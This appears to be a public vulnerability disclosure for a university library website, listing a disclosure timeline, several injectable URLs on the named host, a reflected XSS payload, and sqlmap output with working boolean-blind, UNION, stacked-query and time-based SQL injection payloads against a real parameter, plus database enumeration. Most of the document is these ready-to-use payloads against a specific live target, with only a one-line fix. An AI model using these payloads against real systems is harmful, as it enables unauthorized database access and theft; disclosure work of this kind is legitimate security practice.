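2013-05-13: Actively contacting the vendor and waiting for the vendor to claim the report; details not disclosed publicly
2013-06-27: The vendor has actively ignored the vulnerability; details disclosed to the public
SQL injection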
http://lib.bift.edu.cn:80/detail.asp?map=/movement/20121231104547691.jpg&id=11
http://lib.bift.edu.cn:80/Test2012/piao_deal.asp?page=2
http://lib.bift.edu.cn:80/vote_idea.asp?page=2
http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=&page=2
http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=88888
http://lib.bift.edu.cn:80/briefInf.asp?page=2
http://lib.bift.edu.cn:80/acNavi.asp?page=2
That many.. and that is still not all of them. There is XSS as well
http://lib.bift.edu.cn:80/Test2012/piao.asp?bk=88888<script>alert(1);</sCript>
Place: GET
Parameter: id
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: map=/movement/20121231104547691.jpg&id=11 AND 2820=2820

    Type: UNION query
    Title: Generic UNION query (NULL) - 6 columns
    Payload: map=/movement/20121231104547691.jpg&id=-3633 UNION ALL SELECT NULL, NULL, NULL, NULL, CHAR(58)+CHAR(104)+CHAR(113)+CHAR(110)+CHAR(58)+CHAR(108)+CHAR(108)+CHAR(78)+CHAR(111)+CHAR(106)+CHAR(98)+CHAR(105)+CHAR(102)+CHAR(73)+CHAR(79)+CHAR(58)+CHAR(102)+CHAR(110)+CHAR(98)+CHAR(58), NULL--

    Type: stacked queries
    Title: Microsoft SQL Server/Sybase stacked queries
    Payload: map=/movement/20121231104547691.jpg&id=11; WAITFOR DELAY '0:0:5';--

    Type: AND/OR time-based blind
    Title: Microsoft SQL Server/Sybase time-based blind
    Payload: map=/movement/20121231104547691.jpg&id=11 WAITFOR DELAY '0:0:5'--
---
Database: msdb
[79 tables]
Filter input.
Unable to contact the vendor, or the vendor actively refused